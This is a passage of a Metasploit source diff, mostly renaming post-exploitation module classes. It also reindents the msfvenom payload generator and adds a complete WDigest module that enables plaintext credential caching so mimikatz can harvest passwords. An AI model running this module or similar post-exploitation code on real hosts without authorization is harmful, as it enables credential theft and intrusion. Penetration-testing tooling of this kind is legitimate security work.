::Rex::Post::Meterpreter::RequestError => error + print_error("Could not add route to subnet #{route.subnet}/(#{netmask})") + print_error(error.to_s) + end + end + end + print_status("Did not find any new subnets to add.") if !found + end # Validates the command options def validate_cmd(subnet=nil,netmask=nil) diff --git a/modules/post/windows/manage/change_password.rb b/modules/post/windows/manage/change_password.rb index 889f5af7b9..32d3a7bea2 100644 --- a/modules/post/windows/manage/change_password.rb +++ b/modules/post/windows/manage/change_password.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/clone_proxy_settings.rb b/modules/post/windows/manage/clone_proxy_settings.rb index c270e7bd94..400396dd72 100644 --- a/modules/post/windows/manage/clone_proxy_settings.rb +++ b/modules/post/windows/manage/clone_proxy_settings.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/manage/delete_user.rb b/modules/post/windows/manage/delete_user.rb index 5cc08d1e83..e0728d84d7 100644 --- a/modules/post/windows/manage/delete_user.rb +++ b/modules/post/windows/manage/delete_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/manage/download_exec.rb b/modules/post/windows/manage/download_exec.rb index b920f64184..5a0dc0d74e 100644 --- a/modules/post/windows/manage/download_exec.rb +++ b/modules/post/windows/manage/download_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/manage/driver_loader.rb b/modules/post/windows/manage/driver_loader.rb index 9558084429..4e4683ffe3 100644 --- a/modules/post/windows/manage/driver_loader.rb +++ b/modules/post/windows/manage/driver_loader.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/enable_rdp.rb b/modules/post/windows/manage/enable_rdp.rb index e798ac70a0..55a67d5b42 100644 --- a/modules/post/windows/manage/enable_rdp.rb +++ b/modules/post/windows/manage/enable_rdp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Accounts include Msf::Post::Windows::Registry diff --git a/modules/post/windows/manage/enable_support_account.rb b/modules/post/windows/manage/enable_support_account.rb index c5a949c3f6..6f90cc8129 100644 --- a/modules/post/windows/manage/enable_support_account.rb +++ b/modules/post/windows/manage/enable_support_account.rb @@ -1,7 +1,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/exec_powershell.rb b/modules/post/windows/manage/exec_powershell.rb index 11b6659f6b..7894086acc 100644 --- a/modules/post/windows/manage/exec_powershell.rb +++ b/modules/post/windows/manage/exec_powershell.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/powershell' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Powershell def initialize(info={}) diff --git a/modules/post/windows/manage/forward_pageant.rb b/modules/post/windows/manage/forward_pageant.rb index d8dbf4ee18..e5cba36cef 100644 --- a/modules/post/windows/manage/forward_pageant.rb +++ b/modules/post/windows/manage/forward_pageant.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'tmpdir' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info = {}) diff --git a/modules/post/windows/manage/ie_proxypac.rb b/modules/post/windows/manage/ie_proxypac.rb index 82ff84eb6b..26aaaef4f7 100644 --- a/modules/post/windows/manage/ie_proxypac.rb +++ b/modules/post/windows/manage/ie_proxypac.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File diff --git a/modules/post/windows/manage/inject_ca.rb b/modules/post/windows/manage/inject_ca.rb index f86f5cdf0d..26261c7c52 100644 --- a/modules/post/windows/manage/inject_ca.rb +++ b/modules/post/windows/manage/inject_ca.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/inject_host.rb b/modules/post/windows/manage/inject_host.rb index 0151db3970..d5333cf80f 100644 --- a/modules/post/windows/manage/inject_host.rb +++ b/modules/post/windows/manage/inject_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/killav.rb b/modules/post/windows/manage/killav.rb index fb86ce4401..826bbc8f07 100644 --- a/modules/post/windows/manage/killav.rb +++ b/modules/post/windows/manage/killav.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'set' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/manage/migrate.rb b/modules/post/windows/manage/migrate.rb index 5dd4e6259d..671ee5670f 100644 --- a/modules/post/windows/manage/migrate.rb +++ b/modules/post/windows/manage/migrate.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/mssql_local_auth_bypass.rb b/modules/post/windows/manage/mssql_local_auth_bypass.rb index 5d14a36694..695eba3ede 100644 --- a/modules/post/windows/manage/mssql_local_auth_bypass.rb +++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/mssql' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::MSSQL @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Post OptString.new('DB_USERNAME', [true, 'New sysadmin login', '']), OptString.new('DB_PASSWORD', [true, 'Password for new sysadmin login', '']), OptString.new('INSTANCE', [false, 'Name of target SQL Server instance', nil]), - OptBool.new('REMOVE_LOGIN', [true, 'Remove DB_USERNAME login from database', 'false']) + OptBool.new('REMOVE_LOGIN', [true, 'Remove DB_USERNAME login from database', false]) ], self.class) end diff --git a/modules/post/windows/manage/multi_meterpreter_inject.rb b/modules/post/windows/manage/multi_meterpreter_inject.rb index 4900e1fc64..83ba7c78c0 100644 --- a/modules/post/windows/manage/multi_meterpreter_inject.rb +++ b/modules/post/windows/manage/multi_meterpreter_inject.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) diff --git a/modules/post/windows/manage/nbd_server.rb b/modules/post/windows/manage/nbd_server.rb index 41f786ac8c..2395a2faa7 100644 --- a/modules/post/windows/manage/nbd_server.rb +++ b/modules/post/windows/manage/nbd_server.rb @@ -13,7 +13,7 @@ # Mississippi State University National Forensics Training Center # http://msu-nftc.org -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb index 10c6317646..adfb373da6 100644 --- a/modules/post/windows/manage/payload_inject.rb +++ b/modules/post/windows/manage/payload_inject.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/common' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Common diff --git a/modules/post/windows/manage/portproxy.rb b/modules/post/windows/manage/portproxy.rb index 2fc0584665..73d139ba05 100644 --- a/modules/post/windows/manage/portproxy.rb +++ b/modules/post/windows/manage/portproxy.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/manage/powershell/exec_powershell.rb b/modules/post/windows/manage/powershell/exec_powershell.rb index 8707cb705e..ae8b15ef74 100644 --- a/modules/post/windows/manage/powershell/exec_powershell.rb +++ b/modules/post/windows/manage/powershell/exec_powershell.rb @@ -17,7 +17,7 @@ require 'zlib' # TODO: check if this can be done with REX require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Powershell def initialize(info={}) diff --git a/modules/post/windows/manage/powershell/load_script.rb b/modules/post/windows/manage/powershell/load_script.rb index e3d270f9e9..edad0d8571 100644 --- a/modules/post/windows/manage/powershell/load_script.rb +++ b/modules/post/windows/manage/powershell/load_script.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Powershell def initialize(info={}) diff --git a/modules/post/windows/manage/pptp_tunnel.rb b/modules/post/windows/manage/pptp_tunnel.rb index 4f71034b08..2dfc967798 100644 --- a/modules/post/windows/manage/pptp_tunnel.rb +++ b/modules/post/windows/manage/pptp_tunnel.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index 04cba5d6c3..8030f78575 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Post It will do everything it can to migrate, including spawing a new User level process. For sessions with Admin rights: It will try to migrate into a System level process in the following order: ANAME (if specified), services.exe, winlogon.exe, wininit.exe, lsm.exe, and lsass.exe. - If al these fail, it will fall back to User level migration. For sessions with User level rights: + If all these fail, it will fall back to User level migration. For sessions with User level rights: It will try to migrate to a user level process, if that fails it will attempt to spawn the process then migrate to it. It will attempt the User level processes in the following order: NAME (if specified), explorer.exe, then notepad.exe.}, @@ -53,6 +53,7 @@ class Metasploit3 < Msf::Post end # This function returns the first process id of a process with the name provided. + # It will make sure that the process has a visible user meaning that the session has rights to that process. # Note: "target_pid = session.sys.process[proc_name]" will not work when "include Msf::Post::Windows::Priv" is in the module. # # @return [Fixnum] the PID if one is found @@ -60,7 +61,9 @@ class Metasploit3 < Msf::Post def get_pid(proc_name) processes = client.sys.process.get_processes processes.each do |proc| - return proc['pid'] if proc['name'] == proc_name + if proc['name'] == proc_name && proc['user'] != "" + return proc['pid'] + end end return nil end diff --git a/modules/post/windows/manage/pxeexploit.rb b/modules/post/windows/manage/pxeexploit.rb index 8692ed4a64..2ef7e54b0f 100644 --- a/modules/post/windows/manage/pxeexploit.rb +++ b/modules/post/windows/manage/pxeexploit.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb index f52eac1e24..93f47f6f5e 100644 --- a/modules/post/windows/manage/reflective_dll_inject.rb +++ b/modules/post/windows/manage/reflective_dll_inject.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::ReflectiveDLLInjection diff --git a/modules/post/windows/manage/remove_ca.rb b/modules/post/windows/manage/remove_ca.rb index 2a2437d0d2..4df9dd274e 100644 --- a/modules/post/windows/manage/remove_ca.rb +++ b/modules/post/windows/manage/remove_ca.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/remove_host.rb b/modules/post/windows/manage/remove_host.rb index 9f78208ea3..733af81ad7 100644 --- a/modules/post/windows/manage/remove_host.rb +++ b/modules/post/windows/manage/remove_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/manage/rpcapd_start.rb b/modules/post/windows/manage/rpcapd_start.rb index b49600378b..55b430af9a 100644 --- a/modules/post/windows/manage/rpcapd_start.rb +++ b/modules/post/windows/manage/rpcapd_start.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry @@ -52,8 +52,8 @@ class Metasploit3 < Msf::Post print_status("Setting rpcapd as 'auto' service") service_change_startup("rpcapd", START_TYPE_AUTO) end - if datastore['ACTIVE']==true - if datastore['RHOST']==nil + if datastore['ACTIVE'] + if datastore['RHOST'].nil? print_error("RHOST is not set ") return else @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Post print_status("Installing rpcap in PASSIVE mode (local port: #{datastore['PORT']}) ") p = prog << " -d -p #{datastore['PORT']} " end - if datastore['NULLAUTH']==true + if datastore['NULLAUTH'] p<< "-n" end run_rpcapd(p) diff --git a/modules/post/windows/manage/run_as.rb b/modules/post/windows/manage/run_as.rb index 36137acf65..c471b7042b 100644 --- a/modules/post/windows/manage/run_as.rb +++ b/modules/post/windows/manage/run_as.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Runas diff --git a/modules/post/windows/manage/sdel.rb b/modules/post/windows/manage/sdel.rb index a2691cc1d4..4ee17a767b 100644 --- a/modules/post/windows/manage/sdel.rb +++ b/modules/post/windows/manage/sdel.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Post n = datastore['ITERATIONS'] file = datastore['FILE'] - if datastore['ZERO']==true + if datastore['ZERO'] type = 0 print_status("The file will be overwritten with null bytes") end diff --git a/modules/post/windows/manage/smart_migrate.rb b/modules/post/windows/manage/smart_migrate.rb index 9abc02bc75..51a7bae487 100644 --- a/modules/post/windows/manage/smart_migrate.rb +++ b/modules/post/windows/manage/smart_migrate.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Module::Deprecated diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb index ce5bdbc771..e807ae2caf 100644 --- a/modules/post/windows/manage/sticky_keys.rb +++ b/modules/post/windows/manage/sticky_keys.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/manage/vss_create.rb b/modules/post/windows/manage/vss_create.rb index a377af66a8..a4ce9d424c 100644 --- a/modules/post/windows/manage/vss_create.rb +++ b/modules/post/windows/manage/vss_create.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_list.rb b/modules/post/windows/manage/vss_list.rb index 35737fb343..3d3d1c5572 100644 --- a/modules/post/windows/manage/vss_list.rb +++ b/modules/post/windows/manage/vss_list.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_mount.rb b/modules/post/windows/manage/vss_mount.rb index d71fe54b43..36b43bfe00 100644 --- a/modules/post/windows/manage/vss_mount.rb +++ b/modules/post/windows/manage/vss_mount.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_set_storage.rb b/modules/post/windows/manage/vss_set_storage.rb index c61fd6e128..2a969572d8 100644 --- a/modules/post/windows/manage/vss_set_storage.rb +++ b/modules/post/windows/manage/vss_set_storage.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/vss_storage.rb b/modules/post/windows/manage/vss_storage.rb index 599902d94c..e94a6a68e4 100644 --- a/modules/post/windows/manage/vss_storage.rb +++ b/modules/post/windows/manage/vss_storage.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy diff --git a/modules/post/windows/manage/wdigest_caching.rb b/modules/post/windows/manage/wdigest_caching.rb new file mode 100644 index 0000000000..f792e2e9b0 --- /dev/null +++ b/modules/post/windows/manage/wdigest_caching.rb @@ -0,0 +1,98 @@ +require 'msf/core' +require 'rex' +require 'msf/core/auxiliary/report' + +class MetasploitModule < Msf::Post + include Msf::Post::Windows::Registry + + WDIGEST_REG_LOCATION = 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest' + USE_LOGON_CREDENTIAL = 'UseLogonCredential' + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Windows Post Manage WDigest Credential Caching', + 'Description' => %q{ + On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables + credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key. + Any subsequest logins will allow mimikatz to recover the plain text passwords from the system's memory. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>'], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + + register_options( + [ + OptBool.new('ENABLE',[false,'Enable the WDigest Credential Cache.',true]) + ], self.class) + end + + # Run Method for when run command is issued + def run + print_status("Running module against #{sysinfo['Computer']}") + # Check if OS is 8/2012 or newer. If not, no need to set the registry key + # Can be backported to Windows 7, 2k8R2 but defaults to enabled... + if sysinfo['OS'] =~ /Windows (XP|Vista|200[03])/i + print_status('Older Windows version detected. No need to enable the WDigest Security Provider. Exiting...') + else + datastore['ENABLE'] ? wdigest_enable : wdigest_disable + end + end + + def get_key + # Check if the key exists. Not present by default + print_status("Checking if the #{WDIGEST_REG_LOCATION}\\#{USE_LOGON_CREDENTIAL} DWORD exists...") + begin + wdvalue = registry_getvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL) + key_exists = !wdvalue.nil? + + print_status("#{USE_LOGON_CREDENTIAL} is set to #{wdvalue}") if key_exists + return wdvalue + rescue Rex::Post::Meterpreter::RequestError => e + fail_with(Failure::Unknown, "Unable to access registry key: #{e}") + end + end + + def wdigest_enable + wdvalue = get_key + key_exists = !wdvalue.nil? + # If it is not present, create it + if key_exists && wdvalue == 1 + print_good('Registry value is already set. WDigest Security Provider is enabled') + else + begin + verb = key_exists ? 'Setting' : 'Creating' + print_status("#{verb} #{USE_LOGON_CREDENTIAL} DWORD value as 1...") + if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, 1, 'REG_DWORD') + print_good('WDigest Security Provider enabled') + else + print_error('Unable to access registry key - insufficient privileges?') + end + rescue Rex::Post::Meterpreter::RequestError => e + fail_with(Failure::Unknown, "Unable to access registry key: #{e}") + end + end + end + + def wdigest_disable + wdvalue = get_key + key_exists = !wdvalue.nil? + # If it is not present, create it + if key_exists && wdvalue == 0 + print_good('Registry value is already set. WDigest Security Provider is disabled') + else + begin + verb = key_exists ? 'Setting' : 'Creating' + print_status("#{verb} #{USE_LOGON_CREDENTIAL} DWORD value as 0...") + if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, 0, 'REG_DWORD') + print_good('WDigest Security Provider disabled') + else + print_error('Unable to access registry key - insufficient privileges?') + end + rescue Rex::Post::Meterpreter::RequestError => e + fail_with(Failure::Unknown, "Unable to access registry key: #{e}") + end + end + end +end diff --git a/modules/post/windows/manage/webcam.rb b/modules/post/windows/manage/webcam.rb index eb156773d4..b309721d89 100644 --- a/modules/post/windows/manage/webcam.rb +++ b/modules/post/windows/manage/webcam.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index cc2ad55784..0a87c7dc3b 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/recon/outbound_ports.rb b/modules/post/windows/recon/outbound_ports.rb index 31196ce2c6..6c7c9f5460 100644 --- a/modules/post/windows/recon/outbound_ports.rb +++ b/modules/post/windows/recon/outbound_ports.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/recon/resolve_ip.rb b/modules/post/windows/recon/resolve_ip.rb index 4e3028f341..2734a2655d 100644 --- a/modules/post/windows/recon/resolve_ip.rb +++ b/modules/post/windows/recon/resolve_ip.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/wlan/wlan_bss_list.rb b/modules/post/windows/wlan/wlan_bss_list.rb index 00baa5c710..e1b324d38a 100644 --- a/modules/post/windows/wlan/wlan_bss_list.rb +++ b/modules/post/windows/wlan/wlan_bss_list.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/windows/wlan/wlan_current_connection.rb b/modules/post/windows/wlan/wlan_current_connection.rb index a34db4f8c2..e4c9f60808 100644 --- a/modules/post/windows/wlan/wlan_current_connection.rb +++ b/modules/post/windows/wlan/wlan_current_connection.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/windows/wlan/wlan_disconnect.rb b/modules/post/windows/wlan/wlan_disconnect.rb index 20ef90546a..284203dc98 100644 --- a/modules/post/windows/wlan/wlan_disconnect.rb +++ b/modules/post/windows/wlan/wlan_disconnect.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/windows/wlan/wlan_profile.rb b/modules/post/windows/wlan/wlan_profile.rb index b16b0965e7..ab7d8e4252 100644 --- a/modules/post/windows/wlan/wlan_profile.rb +++ b/modules/post/windows/wlan/wlan_profile.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/msfupdate b/msfupdate index 76d16f5afe..7ea3426c35 100755 --- a/msfupdate +++ b/msfupdate @@ -185,7 +185,14 @@ class Msfupdate system("git", "merge", "#{remote}/#{branch}") stdout.puts "[*] Updating gems..." - require 'bundler' + begin + require 'bundler' + rescue LoadError + stderr.puts '[*] Installing bundler' + system('gem', 'install', 'bundler') + Gem.clear_paths + require 'bundler' + end Bundler.with_clean_env do system("bundle", "install") end diff --git a/msfvenom b/msfvenom index 045cb07e78..6c25288081 100755 --- a/msfvenom +++ b/msfvenom @@ -17,356 +17,345 @@ require 'msf/base' require 'msf/core/payload_generator' - class MsfVenomError < StandardError; end - class UsageError < MsfVenomError; end - class NoTemplateError < MsfVenomError; end - class IncompatibleError < MsfVenomError; end +class MsfVenomError < StandardError; end +class UsageError < MsfVenomError; end +class NoTemplateError < MsfVenomError; end +class IncompatibleError < MsfVenomError; end - require 'optparse' +require 'optparse' - # Creates a new framework object. - # - # @note Ignores any previously cached value. - # @param (see ::Msf::Simple::Framework.create) - # @return [Msf::Framework] - def init_framework(create_opts={}) - create_opts[:module_types] ||= [ - ::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP - ] - @framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true)) +# Creates a new framework object. +# +# @note Ignores any previously cached value. +# @param (see ::Msf::Simple::Framework.create) +# @return [Msf::Framework] +def init_framework(create_opts={}) + create_opts[:module_types] ||= [ + ::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP + ] + @framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true)) +end + +# Cached framework object +# +# @return [Msf::Framework] +def framework + return @framework if @framework + + init_framework + + @framework +end + + +def parse_args(args) + opts = {} + datastore = {} + opt = OptionParser.new + banner = "MsfVenom - a Metasploit standalone payload generator.\n" + banner << "Also a replacement for msfpayload and msfencode.\n" + banner << "Usage: #{$0} [options] <var=val>" + opt.banner = banner + opt.separator('') + opt.separator('Options:') + + opt.on('-p', '--payload <payload>', String, + 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p| + if p == '-' + opts[:payload] = 'stdin' + else + opts[:payload] = p + end end - # Cached framework object - # - # @return [Msf::Framework] - def framework - return @framework if @framework - - init_framework - - @framework + opt.on('--payload-options', "List the payload's standard options") do + opts[:list_options] = true end - - def parse_args(args) - opts = {} - datastore = {} - opt = OptionParser.new - banner = "MsfVenom - a Metasploit standalone payload generator.\n" - banner << "Also a replacement for msfpayload and msfencode.\n" - banner << "Usage: #{$0} [options] <var=val>" - opt.banner = banner - opt.separator('') - opt.separator('Options:') - - opt.on('-p', '--payload <payload>', String, - 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p| - if p == '-' - opts[:payload] = 'stdin' - else - opts[:payload] = p - end + opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| + if l.nil? or l.empty? + l = ["all"] end + opts[:list] = l + end - opt.on('--payload-options', "List the payload's standard options") do - opts[:list_options] = true + opt.on('-n', '--nopsled <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| + opts[:nops] = n.to_i + end + + opt.on('-f', '--format <format>', String, "Output format (use --help-formats for a list)") do |f| + opts[:format] = f + end + + opt.on('--help-formats', String, "List available formats") do + init_framework(:module_types => []) + msg = "Executable formats\n" + + "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" + + "Transform formats\n" + + "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ") + raise UsageError, msg + end + + opt.on('-e', '--encoder <encoder>', String, 'The encoder to use') do |e| + opts[:encoder] = e + end + + opt.on('-a', '--arch <arch>', String, 'The architecture to use') do |a| + opts[:arch] = a + end + + opt.on('--platform <platform>', String, 'The platform of the payload') do |l| + opts[:platform] = l + end + + opt.on('--help-platforms', String, 'List available platforms') do + init_framework(:module_types => []) + supported_platforms = [] + Msf::Module::Platform.subclasses.each {|c| supported_platforms << "#{c.realname.downcase}"} + msg = "Platforms\n" + + "\t" + supported_platforms * ", " + raise UsageError, msg + end + + opt.on('-s', '--space <length>', Integer, 'The maximum size of the resulting payload') do |s| + opts[:space] = s + end + + opt.on('--encoder-space <length>', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s| + opts[:encoder_space] = s + end + + opt.on('-b', '--bad-chars <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| + opts[:badchars] = Rex::Text.hex_to_raw(b) + end + + opt.on('-i', '--iterations <count>', Integer, 'The number of times to encode the payload') do |i| + opts[:iterations] = i + end + + opt.on('-c', '--add-code <path>', String, 'Specify an additional win32 shellcode file to include') do |x| + opts[:add_code] = x + end + + opt.on('-x', '--template <path>', String, 'Specify a custom executable file to use as a template') do |x| + opts[:template] = x + end + + opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do + opts[:keep] = true + end + + opt.on('-o', '--out <path>', 'Save the payload') do |x| + opts[:out] = x + end + + opt.on('-v', '--var-name <name>', String, 'Specify a custom variable name to use for certain output formats') do |x| + opts[:var_name] = x + end + + opt.on('--smallest', 'Generate the smallest possible payload') do + opts[:smallest] = true + end + + opt.on_tail('-h', '--help', 'Show this message') do + raise UsageError, "#{opt}" + end + + begin + opt.parse!(args) + rescue OptionParser::InvalidOption => e + raise UsageError, "Invalid option\n#{opt}" + rescue OptionParser::MissingArgument => e + raise UsageError, "Missing required argument for option\n#{opt}" + end + + if opts.empty? 